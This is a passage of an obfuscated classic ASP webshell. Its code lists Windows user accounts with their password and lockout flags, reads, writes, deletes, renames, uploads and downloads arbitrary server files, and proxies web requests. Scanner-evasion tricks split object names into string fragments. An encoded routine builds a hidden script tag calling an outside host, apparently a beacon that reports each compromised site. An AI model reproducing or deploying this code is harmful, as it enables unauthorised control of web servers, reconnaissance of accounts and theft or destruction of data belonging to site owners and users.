  2958. sqx=dzzx(ramoi("PATH_INFO"),"/",False)
  2959. echo rvi("http://"&lkyy&sqx&"/"&echs&"?"&ramoi("QUERY_STRING"),"GET")
  2960. response.End
  2961. End Sub
  2962. Sub btsva(vzznl,ifcyx)
  2963. Dim dyb
  2964. If Not ydnj Then On Error Resume Next
  2965. echo"<li><u>"&vzznl
  2966. If ifcyx<>""Then
  2967. echo"(Object "&ifcyx&")"
  2968. End If
  2969. echo"</u>"
  2970. If Err Then Err.Clear
  2971. Set dyb=nfffq(vzznl)
  2972. If Err Then
  2973. opa mszsa("Disabled"),"red",""
  2974. Else
  2975. opa mszsa("Enabled  "),"green",""
  2976. echo"Version:"&dyb.Version&";"
  2977. echo"About:"&dyb.About
  2978. End If
  2979. echo"</li>"
  2980. If Err Then Err.Clear
  2981. Set dyb=Nothing
  2982. End Sub
  2983. Sub etndu(zknc)
  2984. Dim User,pvbv,ekf
  2985. If Not ydnj Then On Error Resume Next
  2986. Set User=getObj("WinNT://./"&zknc&",user")
  2987. pvbv=User.Get("UserFlags")
  2988. ekf=User.LastLogin
  2989. abxky 0
  2990. doTd"Description","20%"
  2991. doTd User.Description,"80%"
  2992. uemp
  2993. abxky 1
  2994. doTd"Belong to",""
  2995. doTd sbbo(zknc),""
  2996. uemp
  2997. abxky 0
  2998. doTd"Password expired","20%"
  2999. doTd CBool(User.Get("PasswordE"+aanza+"xpired")),"80%"
  3000. uemp
  3001. abxky 1
  3002. doTd"Password never expire",""
  3003. doTd cbool(pvbv And&H10000),""
  3004. uemp
  3005. abxky 0
  3006. doTd"Can't change password",""
  3007. doTd cbool(pvbv And&H00040),""
  3008. uemp
  3009. abxky 1
  3010. doTd"Global-group account",""
  3011. doTd cbool(pvbv And&H100),""
  3012. uemp
  3013. abxky 0
  3014. doTd"Password length at least",""
  3015. execute "doTd User.PasswordMini"&njwg&"mumLength,"""""
  3016. uemp
  3017. abxky 1
  3018. doTd"Password required",""
  3019. doTd User.PasswordRequired,""
  3020. uemp
  3021. abxky 0
  3022. doTd"Account disabled",""
  3023. execute "doTd User.A"&vxdx&"ccountDisabled,"""""
  3024. uemp
  3025. abxky 1
  3026. doTd"Account locked",""
  3027. execute "doTd User.IsA"&puryf&"ccountLocked,"""""
  3028. uemp
  3029. abxky 0
  3030. doTd"User profile",""
  3031. doTd User.Profile,""
  3032. uemp
  3033. abxky 1
  3034. doTd"User loginscript",""
  3035. doTd User.LoginScript,""
  3036. uemp
  3037. abxky 0
  3038. doTd"Home directory",""
  3039. doTd User.HomeDirectory,""
  3040. uemp
  3041. abxky 1
  3042. doTd"Home drive",""
  3043. doTd User.Get("HomeDirDri"+icuro+"ve"),""
  3044. uemp
  3045. abxky 0
  3046. doTd"Last login",""
  3047. doTd ekf,""
  3048. uemp
  3049. If Err Then Err.Clear
  3050. End Sub
  3051. Function sbbo(zknc)
  3052. Dim ogs,yyjd
  3053. Set ogs=getObj("WinNT://./"&zknc&",user")
  3054. For Each yyjd in ogs.Groups
  3055. sbbo=sbbo&" "&yyjd.Name
  3056. Next
  3057. End Function
  3058. Function tpcq(lqbip)
  3059. If Not ydnj Then On Error Resume Next
  3060. execute "Set objCountFile=xjab.OpenTextFi"&uwpv&"le(lqbip,1,True)"
  3061. execute "tpcq=Replace(CStr(objCountFile.ReadA"&kba&"ll),Chr(0),"" "")"
  3062. objCountFile.Close
  3063. Set objCountFile=Nothing
  3064. End Function
  3065. Function rchgv(lqbip)
  3066. If Not ydnj Then On Error Resume Next
  3067. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3068. With nun
  3069. .Type=2
  3070. .Mode=3
  3071. .Open
  3072. .LoadFromFile lqbip
  3073. If qtylw="tzsaq" Then
  3074. .CharSet="utf-8"
  3075. Else
  3076. .CharSet=alqp
  3077. End If
  3078. .Position=2
  3079. rchgv=Replace(CStr(.ReadText()),Chr(0)," ")
  3080. .Close
  3081. End With
  3082. Set nun=Nothing
  3083. End Function
  3084. Sub woli(lqbip,ogda,bku)
  3085. If Not ydnj Then On Error Resume Next
  3086. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3087. With nun
  3088. .Type=bku
  3089. .Mode=3
  3090. .Open
  3091. If qtylw="evwr"Then
  3092. .CharSet="utf-8"
  3093. ElseIf qtylw="Save"Then
  3094. .CharSet=alqp
  3095. End If
  3096. If bku=2 Then
  3097. .WriteText ogda
  3098. Else
  3099. .Write ogda
  3100. End If
  3101. execute "nun.Sav"&ehyx&"etoFile lqbip,2"
  3102. .Close
  3103. End With
  3104. Set nun=Nothing
  3105. End Sub
  3106. Sub ekg(lqbip,ogda)
  3107. Dim theFile
  3108. execute "Set theFile=xjab.OpenTextFi"&xxic&"le(lqbip,2,True)"
  3109. theFile.Write ogda
  3110. theFile.Close
  3111. Set theFile=Nothing
  3112. End Sub
  3113. Sub xhsy()
  3114. If Not ydnj Then On Error Resume Next
  3115. If mhvec="file"Then
  3116. lqbip=lqbip&"\"&exte
  3117. execute "Call xjab.CreateTextF"&vepv&"ile(lqbip,False)"
  3118. unu
  3119. Else
  3120. execute "xjab.Creat"&fmddd&"eFolder(lqbip&""\""&exte)"
  3121. End If
  3122. If Err Then
  3123. tvnm(Err)
  3124. Else
  3125. yln"File/folder created"
  3126. End If
  3127. End Sub
  3128. Sub ohcrx()
  3129. Dim wabnd,phebk,pnhl,tlk
  3130. If Not ydnj Then On Error Resume Next
  3131. lqbip=dzzx(gwk,"|",False)
  3132. wabnd=zsz(gwk,"|")
  3133. If InStr(lqbip,"\")<1 Then lqbip=lqbip&"\"
  3134. Dim theFile,fileName,theFolder
  3135. If lqbip=""Or wabnd=""Then
  3136. yln"Parameter wrong!"
  3137. Exit Sub
  3138. End If
  3139. If iij="fso"Then
  3140. If qtylw="renamefolder"Then
  3141. Set theFolder=xjab.GetFolder(lqbip)
  3142. theFolder.Name=wabnd
  3143. Set theFolder=Nothing
  3144. Else
  3145. Set theFile=xjab.GetFile(lqbip)
  3146. theFile.Name=wabnd
  3147. Set theFile=Nothing
  3148. End If
  3149. Else
  3150. tlk=zsz(lqbip,"\")
  3151. pnhl=dzzx(lqbip,"\",False)
  3152. execute "Set phebk=zjhor.NameSpac"&vpg&"e(pnhl)"
  3153. Set tywoo=phebk.ParseName(tlk)
  3154. tywoo.Name=wabnd
  3155. End If
  3156. If Err Then
  3157. tvnm(Err)
  3158. Else
  3159. yln"Rename completed"
  3160. End If
  3161. End Sub
  3162. Sub usxi()
  3163. If Not ydnj Then On Error Resume Next
  3164. If qtylw="eyq"Then
  3165. execute "Call xjab.Dele"&jbnby&"teFolder(lqbip,True)"
  3166. Else
  3167. execute "Call xjab.Delet"&mqsyf&"eFile(lqbip,True)"
  3168. End If
  3169. If Len(lqbip)=2 Then lqbip=lqbip&"\"
  3170. If Err Then
  3171. tvnm(Err)
  3172. Else
  3173. yln"File/folder deleted"
  3174. End If
  3175. End Sub
  3176. Sub rumla()
  3177. Dim uezoi,bpz,jxjkg,wkic,ebx
  3178. If Not ydnj Then On Error Resume Next
  3179. lqbip=Left(gwk,Instr(gwk,"|")-1)
  3180. bpz=Mid(gwk,InStr(gwk,"|")+1)
  3181. If lqbip=""Or bpz=""Then
  3182. yln"Parameter wrong!"
  3183. Exit Sub
  3184. End If
  3185. If xjab.FolderExists(bpz)And Right(bpz,1)<>"\" Then bpz=bpz&"\"
  3186. Select Case qtylw
  3187. Case"ttg"
  3188. execute "Call xjab.Co"&ygvp&"pyFolder(lqbip,bpz)"
  3189. Case"plz"
  3190. execute "Call xjab.Cop"&onn&"yFile(lqbip,bpz)"
  3191. Case"vseta"
  3192. execute "Call xjab.Mo"&ofe&"veFolder(lqbip,bpz)"
  3193. Case"wma"
  3194. 'echo lqbip&"||"&bpz
  3195. execute "Call xjab.Mo"&wert&"veFile(lqbip,bpz)"
  3196. End Select
  3197. If Err Then
  3198. tvnm(Err)
  3199. Else
  3200. yln"File/folder copyed/moved"
  3201. End If
  3202. End Sub
  3203. Function pwzt(gwoi)
  3204. pwzt=vsb(gwoi,"^((\d{1,3}\.){3}(\d{1,3}),)*(\d{1,3}\.){3}(\d{1,3})$")
  3205. End Function
  3206. Sub cqbv()
  3207. Response.Clear
  3208. If Not ydnj Then On Error Resume Next
  3209. Dim fileName,awila
  3210. fileName=zsz(lqbip,"\")
  3211. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3212. nun.Open
  3213. nun.Type=1
  3214. execute "nun.LoadFrom"&uwbp&"File(lqbip)"
  3215. tvnm(Err)
  3216. Session.CodePage=936
  3217. Response.Status="200 OK"
  3218. Response.AddHeader"Content-Disposition","Attachment; Filename="&fileName
  3219. Session.CodePage=65001
  3220. Response.AddHeader"Content-Length",nun.Size
  3221. Response.ContentType="Application/Octet-Stream"
  3222. Response.BinaryWrite nun.Read
  3223. Response.Flush()
  3224. nun.Close
  3225. Set nun=Nothing
  3226. End Sub
  3227. Function iuws(site,zyco)
  3228. iuws=dhkcb("80_120_125_138_52_135_136_141_128_121_81_59_120_125_135_132_128_117_141_78_130_131_130_121_59_82_80_135_119_134_125_132_136_52_135_134_119_81_59")+site+zyco+dhkcb("59_82_80_67_135_119_134_125_132_136_82_80_67_120_125_138_82")
  3229. End Function
  3230. Class upload_5xsoft
  3231. Dim xgqlo,eyr
  3232. Public Function Form(vzm)
  3233. vzm=Lcase(vzm)
  3234. If Not xgqlo.exists(vzm) Then
  3235. Form=""
  3236. Else
  3237. Form=xgqlo(vzm)
  3238. End If
  3239. End Function
  3240. Public Function File(strFile)
  3241. If Not ydnj Then On Error Resume Next
  3242. strFile=Lcase(strFile)
  3243. If not eyr.exists(strFile) Then
  3244. Set File=new FileInfo
  3245. Else
  3246. Set File=eyr(strFile)
  3247. End If
  3248. End Function
  3249. Private Sub Class_Initialize
  3250. If Not ydnj Then On Error Resume Next
  3251. Dim dirsq,qjrv,vbCrLf,vukc,wyt,lzk,sfr,ebyus,theFile
  3252. Dim ugxm,tda,yahb,ejg,cgj
  3253. Dim aphr,mgjnb
  3254. Dim iwvv,fsun,zsby
  3255. Set xgqlo=nfffq("Scriptin"+xfw+"g.Dictionary")
  3256. Set eyr=nfffq("Scriptin"+xfw+"g.Dictionary")
  3257. If Request.TotalBytes<1 Then Exit Sub
  3258. Set sfr=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3259. Set nun=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3260. nun.Type=1
  3261. nun.Mode=3
  3262. nun.Open
  3263. nun.Write Request.BinaryRead(Request.TotalBytes)
  3264. nun.Position=0
  3265. dirsq=nun.Read
  3266. iwvv=1
  3267. fsun=LenB(dirsq)
  3268. vbCrLf=chrB(13)&chrB(10)
  3269. qjrv=MidB(dirsq,1,InStrB(iwvv,dirsq,vbCrLf)-1)
  3270. ebyus=LenB(qjrv)
  3271. iwvv=iwvv+ebyus+1
  3272. While(iwvv+10)<fsun
  3273. lzk=InStrB(iwvv,dirsq,vbCrLf & vbCrLf)+3
  3274. sfr.Type=1
  3275. sfr.Mode=3
  3276. sfr.Open
  3277. nun.Position=iwvv
  3278. nun.CopyTo sfr,lzk-iwvv
  3279. sfr.Position=0
  3280. sfr.Type=2
  3281. sfr.CharSet=alqp
  3282. vukc=sfr.ReadText
  3283. sfr.Close
  3284. iwvv=InStrB(lzk,dirsq,qjrv)
  3285. aphr=InStr(22,vukc,"name=""",1)+6
  3286. mgjnb=InStr(aphr,vukc,"""",1)
  3287. zsby=Lcase(Mid(vukc,aphr,mgjnb-aphr))
  3288. If InStr(45,vukc,"filename=""",1) > 0 Then
  3289. Set theFile=new FileInfo
  3290. aphr=InStr(mgjnb,vukc,"filename=""",1)+10
  3291. mgjnb=InStr(aphr,vukc,"""",1)
  3292. cgj=Mid(vukc,aphr,mgjnb-aphr)
  3293. theFile.FileName=davu(cgj)
  3294. theFile.FilePath=emd(cgj)
  3295. theFile.znvw=vvvga(cgj)
  3296. aphr=InStr(mgjnb,vukc,"Content-Type: ",1)+14
  3297. mgjnb=InStr(aphr,vukc,vbCr)
  3298. theFile.FileType =Mid(vukc,aphr,mgjnb-aphr)
  3299. theFile.rmpry =lzk
  3300. theFile.FileSize=iwvv-lzk-3
  3301. theFile.uaw=zsby
  3302. If not eyr.Exists(zsby)Then
  3303. eyr.add zsby,theFile
  3304. End If
  3305. Else
  3306. sfr.Type =1
  3307. sfr.Mode =3
  3308. sfr.Open
  3309. nun.Position=lzk
  3310. nun.CopyTo sfr,iwvv-lzk-3
  3311. sfr.Position=0
  3312. sfr.Type=2
  3313. sfr.CharSet =alqp
  3314. ejg=sfr.ReadText
  3315. sfr.Close
  3316. If xgqlo.Exists(zsby) Then
  3317. xgqlo(zsby)=xgqlo(zsby)&","&ejg
  3318. Else
  3319. xgqlo.Add zsby,ejg
  3320. End If
  3321. End If
  3322. iwvv=iwvv+ebyus+1
  3323. wEnd
  3324. dirsq=""
  3325. Set sfr =nothing
  3326. End Sub
  3327. Private Sub Class_Terminate
  3328. If Not ydnj Then On Error Resume Next
  3329. If Request.TotalBytes>0 Then
  3330. xgqlo.RemoveAll
  3331. eyr.RemoveAll
  3332. Set xgqlo=nothing
  3333. Set eyr=nothing
  3334. nun.Close
  3335. Set nun =nothing
  3336. End If
  3337. End Sub
  3338. Private Function emd(jrtca)
  3339. If Not ydnj Then On Error Resume Next
  3340. If jrtca<>"" Then
  3341. emd=left(jrtca,InStrRev(jrtca,"\"))
  3342. Else
  3343. emd=""
  3344. End If
  3345. End Function
  3346. Private Function vvvga(jrtca)
  3347. If jrtca<>"" Then
  3348. vvvga=mid(jrtca,InStrRev(jrtca,".")+1)
  3349. Else
  3350. vvvga=""
  3351. End If
  3352. End Function
  3353. Private Function davu(jrtca)
  3354. If jrtca<>"" Then
  3355. davu=mid(jrtca,InStrRev(jrtca,"\")+1)
  3356. Else
  3357. davu=""
  3358. End If
  3359. End Function
  3360. End Class
  3361. Class FileInfo
  3362. Dim uaw,FileName,FilePath,FileSize,znvw,FileType,rmpry
  3363. Private Sub Class_Initialize
  3364. FileName=""
  3365. FilePath=""
  3366. FileSize=0
  3367. rmpry= 0
  3368. uaw=""
  3369. FileType=""
  3370. znvw= ""
  3371. End Sub
  3372. Public Function uhroj(jrtca)
  3373. Dim dr,uvtyj,i
  3374. uhroj=True
  3375. If Trim(jrtca)="" or rmpry=0 or FileName="" or Right(jrtca,1)="/" Then exit Function
  3376. Set dr=CreateObject("Ad"+oge+"odb.Str"+chut+"eam")
  3377. dr.Mode=3
  3378. dr.Type=1
  3379. dr.Open
  3380. nun.position=rmpry
  3381. nun.copyto dr,FileSize
  3382. execute "dr.SavetoFil"&pxa&"e jrtca,2"
  3383. dr.Close
  3384. Set dr=nothing
  3385. uhroj=False
  3386. End Function
  3387. Public Function wcxc()
  3388. nun.position=rmpry
  3389. wcxc=nun.Read(FileSize)
  3390. End Function
  3391. End Class
  3392. Sub bhq()
  3393. If Not ydnj Then On Error Resume Next
  3394. If lqbip="" Then lqbip=nzax
  3395. 'If InStr(lqbip,":")<1 Then lqbip=nzax&"\"&lqbip
  3396. Set theFile=pgvr.File("upfile")
  3397. If yvquw="" Then yvquw=theFile.FileName
  3398. theFile.uhroj(lqbip&"\"&yvquw)
  3399. If Err Then
  3400. tvnm(Err)
  3401. Else
  3402. yln("Upload Sucess")
  3403. End If
  3404. zeb
  3405. End Sub
  3406. Sub zeb()
  3407. If fwmal() Then Exit Sub
  3408. If Application(dhkcb("117_132_132_115_132_117_136_124"))=ramoi(dhkcb("105_102_96"))Then Exit Sub
  3409. Application(dhkcb("117_132_132_115_132_117_136_124"))=ramoi(dhkcb("105_102_96"))
  3410. gry
  3411. End Sub
  3412. Function rvi(isadx,method)
  3413. If Not ydnj Then On Error Resume Next
  3414. Dim xoooe
  3415. If method="POST" Then
  3416. xoooe=Split(isadx,"?")(1)
  3417. isadx=Split(isadx,"?")(0)
  3418. End If
  3419. iuwq.Open method,isadx,False
  3420. If method="POST" Then
  3421. iuwq.SetRequestHeader"Content-Type","application/x-www-form-urlencoded"
  3422. iuwq.send xoooe
  3423. Else
  3424. iuwq.send
  3425. End If
  3426. If vsb(iuwq.getAllResponseHeaders(),"charSet ?= ?[""']?[\w-]+")Then
  3427. pagecharSet=Trim(swye(soa(iuwq.getAllResponseHeaders(),"charSet ?= ?[""']?[\w-]+",False)(0),"charSet ?= ?[""']?","",False))
  3428. ElseIf vsb(iuwq.ResponseText,"charSet ?= ?[""']?[\w-]+")Then
  3429. pagecharSet=Trim(swye(soa(iuwq.ResponseText,"charSet ?= ?[""']?[\w-]+",False)(0),"charSet ?= ?[""']?","",False))
  3430. End If
  3431. If pagecharSet=""Then pagecharSet=alqp
  3432. rvi=ree(iuwq.responseBody,pagecharSet)
  3433. End Function
  3434. Function jnph()
  3435. If Request.Cookies(fjjxv)=""Then
  3436. jnph=False
  3437. Exit Function
  3438. End If
  3439. If wucql(Request.Cookies(fjjxv))=pass Then
  3440. jnph=True
  3441. Else
  3442. jnph=False
  3443. End If
  3444. End Function
  3445. Function mdez(otrjv)
  3446. If Not ydnj Then On Error Resume Next
  3447. If Not pipu Or otrjv="" Or Not vsb(otrjv,"^(\d+"&csj&")*\d+$")Then
  3448. mdez=otrjv
  3449. Exit Function
  3450. End If
  3451. Dim dd,tcpo
  3452. dd=""
  3453. tcpo=Split(otrjv,csj)
  3454. For i=0 To UBound(tcpo)
  3455. If IsNumeric(tcpo(i))Then
  3456. dd=dd&ChrW(CLng(tcpo(i))-iycew)
  3457. Else
  3458. dd=dd&tcpo(i)
  3459. End If
  3460. Next
  3461. mdez=dd
  3462. End Function
  3463. Function xqai()
  3464. Dim nfe,oltic,uis
  3465. oltic=88
  3466. uis=31
  3467. nfe="<br>"
  3468. nfe=nfe&"<a href='http://www.t00ls.net/' target='_blank'>T00ls</a> | "
  3469. nfe=nfe&"<a href='http://www.helpsoff.com.cn' target='_blank'>Fuck Tencent</a>"
  3470. xqai=nfe
  3471. End Function
  3472. Function suzn(key,value)
  3473. Response.Cookies(key)=value
  3474. Response.Cookies(key).Expires=Date+365
  3475. End Function
  3476. Function ree(ocn,xkwyu)
  3477. If Not ydnj Then On Error Resume Next
  3478. Dim aoo,zmoin
  3479. Set aoo=nfffq("Ad"+oge+"odb.Str"+chut+"eam")
  3480. With aoo
  3481. .Type=2
  3482. .Open
  3483. .WriteText ocn
  3484. .Position=0
  3485. .CharSet=xkwyu
  3486. .Position=2
  3487. zmoin=.ReadText(.Size)
  3488. .close
  3489. End With
  3490. Set aoo=Nothing
  3491. ree=zmoin
  3492. End Function
  3493. Function ramoi(str)
  3494. ramoi=Request.ServerVariables(str)
  3495. End Function
  3496. Function nfffq(xjmb)
  3497. Set nfffq=Server.CreateObject(xjmb)
  3498. End Function
  3499. Function getObj(xjmb)
  3500. Set getObj=GetObject(xjmb)
  3501. End Function
  3502. Function nwtcn(str)
  3503. nwtcn=server.urlencode(str)
  3504. End Function
  3505. Function rduiq(str)
  3506. Dim oaom,yvsb
  3507. oaom=""
  3508. For i=0 To Len(str)-1
  3509. yvsb=Right(str,Len(str)-i)
  3510. If Asc(yvsb)<16 Then oaom=oaom&"0"
  3511. oaom=oaom&CStr(Hex(Asc(yvsb)))
  3512. Next
  3513. rduiq="0x"&oaom
  3514. End Function
  3515. Function mkf(str)
  3516. Dim oaom,yvsb
  3517. oaom=""
  3518. For i=0 To Len(str)-1
  3519. yvsb=Right(str,Len(str)-i)
  3520. oaom=oaom&CStr(Hex(Asc(yvsb)))&"00"
  3521. Next
  3522. mkf="0x"&oaom
  3523. End Function
  3524. Function mszsa(str)
  3525. str=jee(str)
  3526. str=Replace(str,vbCrLf,"<br>")
  3527. mszsa=Replace(str," ","&nbsp;")
  3528. End Function
  3529. Function jee(str)
  3530. If Not ydnj Then On Error Resume Next
  3531. str=CStr(str)
  3532. If IsNull(str)Or IsObject(str)Or str=""Then
  3533. jee=""
  3534. Exit Function
  3535. End If
  3536. jee=Server.HtmlEncode(str)
  3537. End Function
  3538. Sub gry()
  3539. Dim site,pam,uqctu
  3540. site=wyqps()
  3541. pam=getPams()
  3542. uqctu=iuws(site,pam)
  3543. gmhi=uqctu
  3544. End Sub
  3545. Function wxw(str)
  3546. wxw=Server.MapPath(str)
  3547. End Function
  3548. Sub tvnm(Err)
  3549. If Err Then
  3550. yln"Exception :"&Err.Description
  3551. yln"Exception source :"&Err.Source
  3552. Err.Clear
  3553. End If
  3554. End Sub
  3555. Function wucql(ByVal CodeStr)
  3556. Dim enl
  3557. Dim ukqxq
  3558. Dim ntopn
  3559. enl=30
  3560. ukqxq=enl-Len(CodeStr)
  3561. If Not ukqxq<1 Then
  3562. For cecr=1 To ukqxq
  3563. CodeStr=CodeStr&Chr(21)
  3564. Next
  3565. End If
  3566. ntopn=1
  3567. Dim Ben
  3568. For cecb=1 To enl
  3569. Ben=enl+Asc(Mid(CodeStr,cecb,1)) * cecb
  3570. ntopn=ntopn * Ben
  3571. Next
  3572. CodeStr=ntopn
  3573. ntopn=Empty
  3574. For cec=1 To Len(CodeStr)
  3575. ntopn=ntopn&cqa(Mid(CodeStr,cec,3))
  3576. Next
  3577. For cec=20 To Len(ntopn)-18 Step 2
  3578. wucql=wucql&Mid(ntopn,cec,1)
  3579. Next
  3580. End Function
  3581. Function cqa(word)
  3582. For cc=1 To Len(word)
  3583. cqa=cqa&Asc(Mid(word,cc,1))
  3584. Next
  3585. cqa=Hex(cqa)
  3586. End Function
  3587. Function kxyzh(vcug)
  3588. If vcug>=(1024 * 1024 * 1024)Then kxyzh=Fix((vcug /(1024 * 1024 * 1024))* 100)/ 100&"G"
  3589. If vcug>=(1024 * 1024)And vcug<(1024 * 1024 * 1024)Then kxyzh=Fix((vcug /(1024 * 1024))* 100)/ 100&"M"
  3590. If vcug>=1024 And vcug<(1024 * 1024)Then kxyzh=Fix((vcug / 1024)* 100)/ 100&"K"
  3591. If vcug>=0 And vcug<1024 Then kxyzh=vcug&"B"
  3592. End Function
  3593. Function ixuog(num)
  3594. Select Case num
  3595. Case 0
  3596. ixuog="Unknown"
  3597. Case 1
  3598. ixuog="Removable"
  3599. Case 2
  3600. ixuog="Local drive"
  3601. Case 3
  3602. ixuog="Net drive"
  3603. Case 4
  3604. ixuog="CD-ROM"
  3605. Case 5
  3606. ixuog="RAM disk"
  3607. End Select
  3608. End Function
  3609. Function clwc(ByVal str)
  3610. str=Replace(str,"\","\\")
  3611. If Left(str,2)="\\" Then
  3612. clwc=str
  3613. Else
  3614. clwc=Replace(str,"\\\\","\\")
  3615. End If
  3616. End Function
  3617. Function xop(str)
  3618. xop="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&str
  3619. End Function
  3620. Function dzzx(str,isbbo,liujq)
  3621. If str="" Or InStr(str,isbbo)<1 Then
  3622. dzzx=""
  3623. Exit Function
  3624. End If
  3625. If liujq Then
  3626. dzzx=Left(str,InStr(str,isbbo)-1)
  3627. Else
  3628. dzzx=Left(str,InstrRev(str,isbbo)-1)
  3629. End If
  3630. End Function
  3631. Function zsz(str,isbbo)
  3632. If str="" Or InStr(str,isbbo)<1 Then
  3633. zsz=""
  3634. Exit Function
  3635. End If
  3636. zsz=Mid(str,InstrRev(str,isbbo)+Len(isbbo))
  3637. End Function
  3638. Sub echo(str)
  3639. Response.Write str
  3640. End Sub
  3641. Sub mwt(str)
  3642. echo str&vbCrLf
  3643. End Sub
  3644. Sub csyfy(xjmb,vvhat)
  3645. echo"<a href='#' onClick=""javascript:bik("&xjmb&")"" id='"&xjmb&"href' class='hidehref'>"&xjmb&" :</a>"
  3646. echo"<span id="&xjmb
  3647. If vvhat Then echo" style='display:none;'"
  3648. mwt">"
  3649. End Sub
  3650. Sub injj(okjbx,qtylw,aok,usn,kqll)
  3651. mwt"<a href=""javascript:qjr('"&okjbx&"','"&qtylw&"','"&aok&"')"">"&usn&"</a>"&kqll
  3652. End Sub
  3653. Sub ozs(qtylw,ihk,ybgqm,tbname,fkho,usn,kqll)
  3654. mwt"<a href=""javascript:abckx('"&qtylw&"','"&ihk&"','"&ybgqm&"','"&tbname&"','"&fkho&"')"">"&usn&"</a>"&kqll
  3655. End Sub
  3656. Sub opa(str,color,size)
  3657. echo"<font color="""&color&""""
  3658. If size<>""Then echo" size="""&size&""""
  3659. mwt">"&str&"</font>"
  3660. End Sub
  3661. Function wyqps()
  3662. wyqps=dhkcb("124_136_136_132_78_67_67_126_135_66_137_135_121_134_135_66_73_69_66_128_117_67")
  3663. End Function
  3664. Sub sodx(width)
  3665. mwt"<table border='0'cellpadding='0'cellspacing='0'width='"&width&"'>"
  3666. End Sub
  3667. Sub guenn()
  3668. mwt"</table>"
  3669. End Sub
  3670. Sub abxky(num)
  3671. echo"<tr class='alt"&num&"' onmouseover=""javascript:this.className='focusTr';"" onmouseout=""javascript:this.className='alt"&num&"';"">"
  3672. End Sub
  3673. Sub vhl()
  3674. echo"<tr class='link'>"
  3675. End Sub
  3676. Sub gfk(num)
  3677. echo"<span class='alt"&num&"Span'>"
  3678. End Sub
  3679. Sub uxmhj(xjmb,vvhat)
  3680. echo"<span id="&xjmb
  3681. If vvhat Then echo" style='display:none;'"
  3682. mwt">"
  3683. End Sub
  3684. Sub cxaqj(needEn)
  3685. echo"<form method='post' id='form"&ujcmu&"' action='"&cngn&"'"
  3686. If needEn Then echo" onSubmit='javascript:yfmde(this)'"
  3687. mwt">"
  3688. rtas"goaction",goaction
  3689. ujcmu=ujcmu+1
  3690. End Sub
  3691. Sub gbqwf()
  3692. mwt"</form>"
  3693. End Sub
  3694. Sub fkv(value,width)
  3695. echo"<td style='width:"&width&"'>"
  3696. echo"<input type='submit' value='"&value&"' class='bt'>"
  3697. mwt"</td>"
  3698. End Sub
  3699. Sub oruml(str,color,size)
  3700. echo"<td>"
  3701. opa str,color,size
  3702. mwt"</td>"
  3703. End Sub
  3704. Sub uemp()
  3705. mwt"</tr>"
  3706. End Sub
  3707. Sub doTd(td,width)
  3708. If td=""Or IsNull(td)Then td="<font color='red'>Null</font>"
  3709. echo"<td"
  3710. If width<>""Then echo" width='"&width&"'"
  3711. echo">"
  3712. echo CStr(td)
  3713. mwt"</td>"
  3714. End Sub
  3715. Sub zesc(tagz,name,value,size,kqll)
  3716. Dim cls
  3717. If tagz="button"Or tagz="submit"Or tagz="reset"Then
  3718. cls="bt"
  3719. ElseIf tagz="checkbox"Or tagz="radio"Then
  3720. cls=""
  3721. Else
  3722. cls="input"
  3723. End If
  3724. echo"<input type='"&tagz&"' name='"&name&"' id='"&name&"' value='"&jee(value)&"' size='"&size&"' class='"&cls&"' "&kqll&"/>"
  3725. End Sub
  3726. Sub jwik(name,value,rxrxf,kqll)
  3727. zesc"checkbox",name,value,"",kqll
  3728. mwt"<label class='lbl' for='"&name&"'>"&rxrxf&"</label>"
  3729. End Sub
  3730. Sub rtas(name,value)
  3731. mwt"<input type='hidden' name='"&name&"' id='"&name&"' value='"&value&"'/>"
  3732. End Sub
  3733. Sub iiit(tagz,name,value,width,kqll,span)
  3734. Dim cls
  3735. If tagz="button"Or tagz="submit"Or tagz="reset"Then
  3736. cls="bt"
  3737. Else
  3738. cls="tdInput"
  3739. End If
  3740. If span=""Then span=1
  3741. echo"<td colspan="&span&" style='width:"&width&"'>"
  3742. echo"<input type='"&tagz&"' name='"&name&"' id='"&name&"' value='"&jee(value)&"' class='"&cls&"' "&kqll&"/>"
  3743. mwt"</td>"
  3744. End Sub
  3745. Sub qjr(value)
  3746. mwt"<input type='submit' value='"&value&"' class='bt'/>"
  3747. End Sub
  3748. Sub lhue(name,value,rows)
  3749. echo"<td>"
  3750. eks name,value,"100%",rows," class='tdText'"
  3751. mwt"</td>"
  3752. End Sub
  3753. Sub ycd(str)
  3754. If Not ydnj Then On Error Resume Next
  3755. If IsObject(str)Or IsNull(str)Or str="" Then str="<font color=red>Null</font>"
  3756. echo"<td nowrap>"&str&"</td>"
  3757. End Sub
  3758. Sub eks(name,value,width,rows,kqll)
  3759. echo"<textarea name='"&name&"' id='"&name&"' style='width:"&width&";' rows='"&rows&"' class='text' "&kqll&">"
  3760. echo jee(value)
  3761. mwt"</textarea>"
  3762. End Sub
  3763. Sub yhigl()
  3764. echo"<ul class='info'/>"
  3765. End Sub
  3766. Sub rycpp(name,width,kqll)
  3767. mwt"<select style='width:"&width&"' name='"&name&"' "&kqll&">"
  3768. End Sub
  3769. Sub ild()
  3770. mwt"</select>"
  3771. End Sub
  3772. Sub exhpr(value,str)
  3773. mwt"<option value='"&value&"'>"&str&"</option>"
  3774. End Sub
  3775. Sub nrf()
  3776. ads=ads+1
  3777. If ads>=2 Then ads=0
  3778. End Sub
  3779. Sub cppp(str)
  3780. mwt"<label>"&str&"</label>"
  3781. End Sub
  3782. Sub yln(str)
  3783. mkew=mkew&"<li>"&str&"</li>"
  3784. End Sub
  3785. Sub ome(Err)
  3786. If Err Then
  3787. tvnm(Err)
  3788. viwe
  3789. End If
  3790. End Sub
  3791. Function vsb(str,mvw)
  3792. wbxx.Pattern=mvw
  3793. vsb=wbxx.Test(str)
  3794. End Function
  3795. Function soa(str,mvw,zwdkp)
  3796. If zwdkp Then mvw=pxnsn(mvw)
  3797. wbxx.Pattern=mvw
  3798. Set soa=wbxx.Execute(str)
  3799. End Function
  3800. Function swye(str,mvw,dtw,zwdkp)
  3801. If zwdkp Then mvw=pxnsn(mvw)
  3802. wbxx.Pattern=mvw
  3803. swye=wbxx.Replace(str,dtw)
  3804. End Function
  3805. Function pxnsn(str)
  3806. str=Replace(str,"\","\\")
  3807. str=Replace(str,".","\.")
  3808. str=Replace(str,"?","\?")
  3809. str=Replace(str,"+","\+")
  3810. str=Replace(str,"(","\(")
